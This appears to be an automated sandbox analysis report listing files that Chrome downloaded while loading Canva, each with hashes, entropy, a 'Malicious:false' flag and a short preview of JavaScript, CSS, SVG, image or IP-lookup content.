                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6847],{../***/ 523808:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(9164);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var cKc=function({data:a,url:b}){try{const c=JSON.stringify(a,void 0,2);return{extra:new Map([["spans",c.slice(0,15500)],["url",b]]),tags:new Map([["telemetry.export.beacon.over_64_kB",String(64E3<c.length)]])}}catch(c){return{tags:new Map([["telemetry.error.serialisation_error","true"]])}}},eKc=function(a,b){dKc(a,b,()=>{const c=a.wba.get(b.qp().spanId)||[];for(const d of c)eKc(a,d)})},dKc=function(a,b,c){var d,e=null!==(d=b.attrs.get("parent_relative_start_ms"))&&void 0!==d?d:b.duration;e="number"===.typeof e?` - ${Math.round(e)}ms`:"";var f=(d=null!=b.parentSpanId)?`${"event"===b.Gz?"[ChildEvent]":"[ChildSpan]"}: `:"[Open
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):20
                                                                                                                                                                                                                                                                    Entropy (8bit):3.6841837197791887
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:YMb1gXMjHYn:YMeX2Yn
                                                                                                                                                                                                                                                                    MD5:FDDC31DE967A4B3DA76393419B55F9C9
                                                                                                                                                                                                                                                                    SHA1:286EFCC8CE25D3155D352AAB208056B0EE3009EA
                                                                                                                                                                                                                                                                    SHA-256:DB7DE230E919C4DAD9B3F2599BB09E36DB4D3DECCB86AB3577E9EA1CDBDC5E1F
                                                                                                                                                                                                                                                                    SHA-512:E27F55BD7A48B5CBA9B4A244507B409690555B277BCDFF1DEC5DE3CE76B2D43EB3BE2DA958C1BBD90E6375AEAD14C9E996DC7EE9298D70D698458702CB13C93A
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://api.ipify.org/?format=json
                                                                                                                                                                                                                                                                    Preview:{"ip":"8.46.123.75"}
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1087)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):7317
                                                                                                                                                                                                                                                                    Entropy (8bit):5.6740928432486895
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:Ols59JnFktEbwxxOOAjd30V1KPETirWEy:OW59JnFktEbwLOO+d30VQMTCWEy
                                                                                                                                                                                                                                                                    MD5:CF52A438FE0A9D28119B078611A24BCB
                                                                                                                                                                                                                                                                    SHA1:503A4E6E1F032E8C07CC802A588226506C3C79D4
                                                                                                                                                                                                                                                                    SHA-256:E9330D47F5F75E2A995ADBEEF8266712ECA3053822EC68BBC1AC062D09843F90
                                                                                                                                                                                                                                                                    SHA-512:40F406322FA5C9B1DDC2BDD41336B0D7459CAD7363B1A9E9C899C275F10946599A955CFF93F7A99D3E203BF59D8B9014E6BB704D24574D34B53729DECD0F3D12
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[4221],{../***/ 121446:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var Opa,Qpa,Rpa,ci,ki,fqa;Opa=function(a,b){return new __c.Qc(a,__c.Xh(b),__c.Npa,{ignoreTag:!0})};__c.Yh=function(a,b){var c=__c.zaa(),d=Opa,e={};for(var f=0;f<b.length;++f)e[f]=b[f];b=c+"-"+a;if(f=__c.zda.get(b))return e=f.format(e),__c.gb?"\u2062"+e+__c.fb(a):e;f=(f=__c.Aaa[c])&&f[a];null==f&&(f=void 0);if(null==f)throw Error(`Could not find string for ${c} ${a}`);c=d(f,c);__c.zda.set(b,c);e=c.format(e);return __c.gb?"\u2062"+e+__c.fb(a):e};.__c.Zh=function(a,b){let c,d;for(const e of a)if(a=b(e),null==d?!Number.isNaN(a):a>d)c=e,d=a;return c};__c.$h=function(a,b){const c=null!=b?a:0;return Array(Math.max(0,null!=b?Math.ceil(b-c):Math.floor
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):37220
                                                                                                                                                                                                                                                                    Entropy (8bit):7.969199436866898
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:768:WjoVuTWQKc8Jpt+e3Ma0wXiN6FfghtGalrfyIkrQGug7X:EoDhz3XwaghcmKdb7X
                                                                                                                                                                                                                                                                    MD5:DDD2BA33199093D48F8C708FDAEA8740
                                                                                                                                                                                                                                                                    SHA1:C96EAFB0D69EC9AF39C4A2D0D697AF9176E22761
                                                                                                                                                                                                                                                                    SHA-256:852E3B96F2DEA00F7268F24E5901FA0C96B217CBE804AB5E8BBE111815075ED1
                                                                                                                                                                                                                                                                    SHA-512:5A92070841390B5DFC79AB5E6C61FF27BB5A84409C74431D1CAEBCA25ED535656DC996689D59D3FDABBCE7DAC4DC0C35DD8C89E0D8D4C01716E097330001CB5B
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://media.canva.com/v2/image-resize/format:PNG/height:831/quality:100/uri:s3%3A%2F%2Fmedia-private.canva.com%2F_1h7c%2FMAGXBS_1h7c%2F1%2Fp.png/watermark:F/width:1600?csig=AAAAAAAAAAAAAAAAAAAAAIeRpJCdaNjD5eFqoIZKm5NiX2vhXgUuA39yzwgWYvzu&exp=1732129969&osig=AAAAAAAAAAAAAAAAAAAAAIh84Mq_eVXBwPrghDB-WvEJm2_Tf6oLeXfO68GWCD7S&signer=media-rpc&x-canva-quality=screen_2x
                                                                                                                                                                                                                                                                    Preview:RIFF\...WEBPVP8LP.../?...U...I...^..~.1.....t.q....!.")...]Z...T..97\rL'c.Akg.9.;m.zIn....L...L. ...............A..9......9...3..$j3G.c..2.T..q4.)3..a.6..#G...9Z1F]....}...LbEf.H.....6....)GG....&2F=.J.N)...i..[5.F..lQ8...I........6d8%.LkE...13..9bOd.6c.v$.5..H..}...9b....E..Dc..JY.-3C....9..=.'.Oo.q..E<.Bi.....l.V..|.........XJ.1x..J.'..m.$...k......!.......y............z Of...:.-k...rE.Q+&k......V...}.b..4.%[..%fy.3...k..uR....-..e...33Y..J...h..-.%fV.)2.Z..Y.......#fyhg.Z.3..(1.;..+.R,.QB.J`Q.<m[b...g..`A.rK.....F../8..K.C..$..XFRw.;.....m.N......Ik...A...Bq..Q.u.........?.^...o'......y>...q..w.<..<...y>v>GM~..9~....^k.]...^..[S.iP..M...TQ..%..f....U...R.j....0UW0U..A.SS.!..n.A..0..E^.'U....f..B}P5...........A.Q.TQ.f).jUaP;.T.....*.j..Us..jj.0+5(.......S..4U..}..f...iP.r...f....U....iz...BaP..jU..]U.jjP}.ojP+5(.......j0(.N..s..iz.*.JD.' .....................................................................................................................
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1087)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):7317
                                                                                                                                                                                                                                                                    Entropy (8bit):5.6740928432486895
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:Ols59JnFktEbwxxOOAjd30V1KPETirWEy:OW59JnFktEbwLOO+d30VQMTCWEy
                                                                                                                                                                                                                                                                    MD5:CF52A438FE0A9D28119B078611A24BCB
                                                                                                                                                                                                                                                                    SHA1:503A4E6E1F032E8C07CC802A588226506C3C79D4
                                                                                                                                                                                                                                                                    SHA-256:E9330D47F5F75E2A995ADBEEF8266712ECA3053822EC68BBC1AC062D09843F90
                                                                                                                                                                                                                                                                    SHA-512:40F406322FA5C9B1DDC2BDD41336B0D7459CAD7363B1A9E9C899C275F10946599A955CFF93F7A99D3E203BF59D8B9014E6BB704D24574D34B53729DECD0F3D12
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/570ea329b63c4775.js
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[4221],{../***/ 121446:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var Opa,Qpa,Rpa,ci,ki,fqa;Opa=function(a,b){return new __c.Qc(a,__c.Xh(b),__c.Npa,{ignoreTag:!0})};__c.Yh=function(a,b){var c=__c.zaa(),d=Opa,e={};for(var f=0;f<b.length;++f)e[f]=b[f];b=c+"-"+a;if(f=__c.zda.get(b))return e=f.format(e),__c.gb?"\u2062"+e+__c.fb(a):e;f=(f=__c.Aaa[c])&&f[a];null==f&&(f=void 0);if(null==f)throw Error(`Could not find string for ${c} ${a}`);c=d(f,c);__c.zda.set(b,c);e=c.format(e);return __c.gb?"\u2062"+e+__c.fb(a):e};.__c.Zh=function(a,b){let c,d;for(const e of a)if(a=b(e),null==d?!Number.isNaN(a):a>d)c=e,d=a;return c};__c.$h=function(a,b){const c=null!=b?a:0;return Array(Math.max(0,null!=b?Math.ceil(b-c):Math.floor
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1439)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):124787
                                                                                                                                                                                                                                                                    Entropy (8bit):5.743659114188181
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:1536:nLQ5b40k5I4jQaLuiKm60ax//VAyg4pRhE884f17KNXMF+0JeagbqeTSEkeqUA:LK40ajjLuvhi8f17KNcgXYeTSEkeqUA
                                                                                                                                                                                                                                                                    MD5:3BD2EA7D8BF4C20B72F4CEE9429CA81D
                                                                                                                                                                                                                                                                    SHA1:6FECC4519FDC2F776E885A14CB3F9E12ABAC4A5C
                                                                                                                                                                                                                                                                    SHA-256:A35151B1E0CE3DCD108697BDD4927AE10716243413DABCF6BE22781D45B4D447
                                                                                                                                                                                                                                                                    SHA-512:1EE70F30BCAB4A06DC4EAF39A4693C92DD047D42DA984BC1FE1E695060141C6B42FAEC35E98ED67B10B108C367D7C738B28F5C32A4D2AC8A09E41C426FFCBAC8
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/c40487ebdc5035af.js
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6037],{../***/ 214458:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(694173);__web_req__(209121);__web_req__(201099);__web_req__(517447);__web_req__(309729);__web_req__(800513);__web_req__(552859);__web_req__(79194);__web_req__(624833);__web_req__(913728);__web_req__(68864);__web_req__(629056);__web_req__(753339);__web_req__(417775);__web_req__(558104);__web_req__(139504);__web_req__(515388);__web_req__(775089);__web_req__(353279);__web_req__(526023);__web_req__(588845);__web_req__(228043);__web_req__(178040);__web_req__(277425);__web_req__(713410);__web_req__(232149);__web_req__(823125);__web_req__(772112);__web_req__(224868);__web_req__(145431);__web_req__(121446);__web_req__(402398);__web_req__(550863);__web_req__(786266);__web_req__(822778);__web_req__(46127);__web_req__(388999);__web_req__(290
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (62330), with no line terminators
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):79912
                                                                                                                                                                                                                                                                    Entropy (8bit):5.8724809466699295
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:1536:F/x2sTIjkcFMQ+MpI/niY5KSQYLoFMoUEdS/MvpB0CmLwFRTT2DOECQ44oYkX0CN:pIoIQciFd/zXo6oUEdS/MvpBlmLkRTT/
                                                                                                                                                                                                                                                                    MD5:451F69D7C6A992FF4C166BD5AD4C1540
                                                                                                                                                                                                                                                                    SHA1:7C7662D73F1BD7B9879B32B39CC83B1E34523D9A
                                                                                                                                                                                                                                                                    SHA-256:9B1AA2D2A95C9EFD9AA9E9840E0867C9A575D1131A6EC0D2E873EA2263C71B75
                                                                                                                                                                                                                                                                    SHA-512:A69A4608B460DE94FF835BE986EB2E2448424515CFB807F686AA47FDFD7C82B0A26F2403A5ED991094AEE27A905FAC258D5548BC2BB706AB6C076870155FE318
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/90a9bc138217d6b7.vendor.js
                                                                                                                                                                                                                                                                    Preview:(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[4318],{700354:function(n,t){!function(n){var t=Math;function r(n,t){for(var r,e,o,u="",c=t%26,i=0;i<n.length;i++)u+=(e=c,65<=(o=(r=n.charAt(i)).charCodeAt())&&o<=90?String.fromCharCode((o-65+e)%26+65):97<=o&&o<=122?String.fromCharCode((o-97+e)%26+97):32===o?String.fromCharCode(o+1):33===o?String.fromCharCode(o-1):r);return u}function e(n){var t,r={},e=n.split(""),o=e[0],u=[o],c=256,i=e[0],a=256;for(n=1;n<e.length;n++)t=(t=e[n].charCodeAt(0))<c?e[n]:r[t]||i+o,u.push(t),o=t.charAt(0),r[a]=i+o,a++,i=t;return u.join("")}var o=e("gbFgevat?pnyyre,nethzragf.bclSebzPunaary,trg...yQngn?.g.rdh.plErfcbafr..Vzn.....Y.r.fu,vfCb.gVaC........xr,.nfherGrkg,.nqe.vpP.i.b,sv...,f.b...s.g?.gC.c.gl.g....l..h.Lr..Ub.f.Z.hg.....Gv....m.rBss................rp.q..Z..F..........t,.WFBA.bYb........r................,i...?.
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (16044)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):16107
                                                                                                                                                                                                                                                                    Entropy (8bit):5.813816163850166
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:oJnq6sIh6jH3asEKFJenrLATieo8GCp8H6irlwcRicmc5KK4gB9sj0T1k:MqBIh6T3asEBn29p8aOmgsj0TK
                                                                                                                                                                                                                                                                    MD5:717F7297528B5128054EF0E2C9ACE69D
                                                                                                                                                                                                                                                                    SHA1:A3B1E71437DB1EF897530F05E6AF9DCBCC6202C4
                                                                                                                                                                                                                                                                    SHA-256:879D2715930D05CCE5F39C77AA4E8070F6574C959F219895BDD261D463AB3CAF
                                                                                                                                                                                                                                                                    SHA-512:F8AEE9B297A55B4BE87870A9B17DE2CA6A85C22A3BCE92C08000A8ECC1FBC2252E6153984D24C8A056D77818C796A91F025BF904ED8173A4F2D0DBB425895B50
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/1790b19a3beefdca.ltr.css
                                                                                                                                                                                                                                                                    Preview:.rZySiw{-webkit-tap-highlight-color:transparent;cursor:pointer;display:flex}.l0XMHQ{align-items:center;padding:4px 0}.WEJeTw{cursor:not-allowed}.UufAxw{-webkit-appearance:none;appearance:none;margin:0;opacity:0;width:0}.Emp7Uw{align-self:flex-start}.Emp7Uw,.Q5j_pg{display:inline-flex}.Q5j_pg{align-items:center;background:var(--C-q6Ig);border-radius:4px;box-shadow:inset 0 0 0 1px var(---UopgA);flex:0 0;justify-content:center;margin:4px;transition:box-shadow .1s ease-in-out}.Q5j_pg:before{content:"\00200B";width:0}.Q5j_pg{height:16px;width:16px}.Q5j_pg.EhOJ2A{height:24px;width:24px}._8LCIjg.Q5j_pg{color:var(--eGVbng)}.AF_FAg.Q5j_pg{color:inherit}.AzLxTA,.DPVGEQ{color:var(--d1p99w);opacity:0}.Q5j_pg.BZUMgg,.Q5j_pg._1Gr7oQ{box-shadow:inset 0 0 0 8px}.Q5j_pg.EhOJ2A.BZUMgg,.Q5j_pg.EhOJ2A._1Gr7oQ{box-shadow:inset 0 0 0 16px}.Q5j_pg.BZUMgg .DPVGEQ,.Q5j_pg._1Gr7oQ .AzLxTA{opacity:1}.Q5j_pg.EhOJ2A.WEJeTw,.Q5j_pg.WEJeTw{background:var(--oqurdw);box-shadow:inset 0 0 0 1px var(--VjFOWQ)}.WEJeTw .Az
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):1865
                                                                                                                                                                                                                                                                    Entropy (8bit):4.5836861143934104
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:t8BQuQeRMDZCgVaMjCLSR9gVa/DtCLSX3GcCTEtRupMxaF7zDNKVoStCG/zoWSiN:Yhc7Vf0HVzG3GBMDURxbWlPjJH9J3mBe
                                                                                                                                                                                                                                                                    MD5:3E78EF31F2928A74C6D7BA19B91D0570
                                                                                                                                                                                                                                                                    SHA1:FA840BD4404B1B843A72164F2491AF6C4718A214
                                                                                                                                                                                                                                                                    SHA-256:847435388F6B42D6C869D02DF3EC08D61333A19AC4B90EBBFF3BC0B87B60A202
                                                                                                                                                                                                                                                                    SHA-512:0B1951AD9492468748B18217003BF7EBAD56FA14CB434C37D6DF2440C43D73AF5AA9068EC517596E9D63B150F3ED28C20F44FFCD6814DF70D2C9228C91994DDE
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/images/3e78ef31f2928a74c6d7ba19b91d0570.svg
                                                                                                                                                                                                                                                                    Preview:<svg width="33" height="32" viewBox="0 0 33 32" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M32.29 16c0 8.837-7.164 16-16 16-8.837 0-16-7.163-16-16 0-8.836 7.163-16 16-16 8.836 0 16 7.164 16 16Z" fill="url(#_3900663394__a)"/><path d="M26.131 15.809c-.055-.127-1.41-3.103-4.195-3.103-2.783 0-4.138 2.976-4.195 3.103a.47.47 0 0 0 .136.556c.165.134.4.138.575.013.011-.009 1.188-.849 3.484-.849 2.284 0 3.458.83 3.485.848a.469.469 0 0 0 .574-.01.471.471 0 0 0 .136-.558ZM14.836 15.809c-.056-.127-1.41-3.103-4.195-3.103-2.783 0-4.138 2.976-4.194 3.103a.47.47 0 0 0 .71.569c.011-.009 1.187-.849 3.484-.849 2.284 0 3.458.83 3.485.848a.468.468 0 0 0 .574-.01.47.47 0 0 0 .136-.558ZM28.524 14.118a.943.943 0 0 1-.874-.592c-1.673-4.183-5.856-5.064-5.898-5.074a.94.94 0 1 1 .369-1.844c.212.041 5.229 1.099 7.278 6.219a.942.942 0 0 1-.875 1.291ZM4.053 14.118a.941.941 0 0 1-.873-1.291c2.048-5.12 7.065-6.178 7.277-6.22a.94.94 0 0 1 .373 1.845c-.174.036-4.242.923-5.902 5.074a.944.944 0 0 1-.875.592ZM
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (48664)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):48944
                                                                                                                                                                                                                                                                    Entropy (8bit):5.272507874206726
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                                                                                                                                                                                                    MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                                                                                                                                                                    SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                                                                                                                                                                    SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                                                                                                                                                                    SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):842
                                                                                                                                                                                                                                                                    Entropy (8bit):4.957424326112546
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:tzBXuJlRGZ6vzSiMEjeK7IhdHxsGJcGmBe:ju843M/JhdH9J3mBe
                                                                                                                                                                                                                                                                    MD5:3A05DBF1CDD156FCD1677A0B444CC36F
                                                                                                                                                                                                                                                                    SHA1:4DBD36F62A617F47B69FB2D5F83BF0FE36ECE44A
                                                                                                                                                                                                                                                                    SHA-256:4C122BDEABCF8A8C613B81B5B881469574DAA61B870651D9F06D0F81B4405271
                                                                                                                                                                                                                                                                    SHA-512:CE05D3A04F285E246AC43798C384674FB5D292CEA0911CACFD6A7E10772C77B6997D5ED50BF298DDBB6096A02D06BC1E01324C1A35623E07834C8AFC63D536E6
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/images/3a05dbf1cdd156fcd1677a0b444cc36f.svg
                                                                                                                                                                                                                                                                    Preview:<svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M32 16c0 8.837-7.163 16-16 16S0 24.837 0 16 7.163 0 16 0s16 7.163 16 16Z" fill="url(#_1562409365__a)"/><path d="M12.235 12.235c0 1.56-.903 2.824-2.017 2.824-1.114 0-2.017-1.264-2.017-2.824 0-1.56.903-2.823 2.017-2.823 1.114 0 2.017 1.264 2.017 2.823ZM23.53 12.047c0 1.456-.843 2.635-1.883 2.635s-1.882-1.18-1.882-2.635c0-1.455.843-2.635 1.882-2.635 1.04 0 1.882 1.18 1.882 2.635ZM19.765 22.588c0 2.6-1.687 4.706-3.765 4.706-2.08 0-3.765-2.105-3.765-4.706 0-2.598 1.685-4.706 3.765-4.706 2.078 0 3.765 2.108 3.765 4.706Z" fill="#664500"/><defs><linearGradient id="_1562409365__a" x1="16" y1="32" x2="16" y2="0" gradientUnits="userSpaceOnUse"><stop stop-color="#FFCC4D"/><stop offset="1" stop-color="#FFDF8E"/></linearGradient></defs></svg>
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3452)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):3515
                                                                                                                                                                                                                                                                    Entropy (8bit):5.509265096405096
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:TCVbvk2xq/uCxbwvxd/t6J3CmIRvV/dCiTqg:TCVbvk2xsuCxbwvx5t6J3CmOvV/gLg
                                                                                                                                                                                                                                                                    MD5:B444A6FB41B0E085E832EB8713EFEB8E
                                                                                                                                                                                                                                                                    SHA1:A0E52DCCEE7ECBBD2EB2F7E152576578645AC7F1
                                                                                                                                                                                                                                                                    SHA-256:AA8E14DDA7BA1EBFE2713D5E37779247483772A3D3A1C33C1864D103F2CE7B02
                                                                                                                                                                                                                                                                    SHA-512:1A8F457B346CD6EFE93E81A1EAA59CF0354F429432D49EAA1003047F45D4FA80DDDA4F045F79A519204CA144EB4E1880FA370C3974A75B4208BC1AF295735703
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/9e8a760576f2dccd.ltr.css
                                                                                                                                                                                                                                                                    Preview:._9THBXA{height:calc(var(--wQwVGw, .1rem)*24);padding:calc(var(--wQwVGw, .1rem)*36/2 - var(--wQwVGw, .1rem)*24/2) 0}.uxF7og._9THBXA{height:calc(var(--wQwVGw, .1rem)*64);padding:calc(var(--wQwVGw, .1rem)*84/2 - var(--wQwVGw, .1rem)*64/2) 0}.T5IBlw{height:calc(var(--wQwVGw, .1rem)*21);padding:calc(var(--wQwVGw, .1rem)*32/2 - var(--wQwVGw, .1rem)*21/2) 0}.uxF7og.T5IBlw{height:calc(var(--wQwVGw, .1rem)*48);padding:calc(var(--wQwVGw, .1rem)*64/2 - var(--wQwVGw, .1rem)*48/2) 0}.mamTNQ{height:calc(var(--wQwVGw, .1rem)*16);padding:calc(var(--wQwVGw, .1rem)*26/2 - var(--wQwVGw, .1rem)*16/2) 0}.uxF7og.mamTNQ{height:calc(var(--wQwVGw, .1rem)*32);padding:calc(var(--wQwVGw, .1rem)*42/2 - var(--wQwVGw, .1rem)*32/2) 0}.OJPDgQ{height:calc(var(--wQwVGw, .1rem)*14);padding:calc(var(--wQwVGw, .1rem)*22/2 - var(--wQwVGw, .1rem)*14/2) 0}.uxF7og.OJPDgQ{height:calc(var(--wQwVGw, .1rem)*24);padding:calc(var(--wQwVGw, .1rem)*32/2 - var(--wQwVGw, .1rem)*24/2) 0}._73i4_A{height:calc(var(--wQwVGw, .1rem)*12);padd
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5138)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):158080
                                                                                                                                                                                                                                                                    Entropy (8bit):5.718598188027346
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3072:CcipKBNwjdgr66mkgBEh3IdOUFAXg6qjSU1eza6BsU2VmdKnwKluy:CcipKBNwjdgr66mkcEh3IkvPYSU1aBsX
                                                                                                                                                                                                                                                                    MD5:750703F7D42E2FE0F2FC289CDC8AA4DB
                                                                                                                                                                                                                                                                    SHA1:D6D61FE93BE9C66E9FC58BB62E43C0640EF3BBDB
                                                                                                                                                                                                                                                                    SHA-256:871018C0C50557AB8A2C0D4C69DD09457E607119CBE6F750B9412C97A84897EF
                                                                                                                                                                                                                                                                    SHA-512:D95298C55CEB2866553BACE2DC1F894B777715DCB7F7DD9235031F59FF2CE26EA9A39CA03DAE913C33956096FDA98A66694D59CB2A3053AEF52EB37931E088D9
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
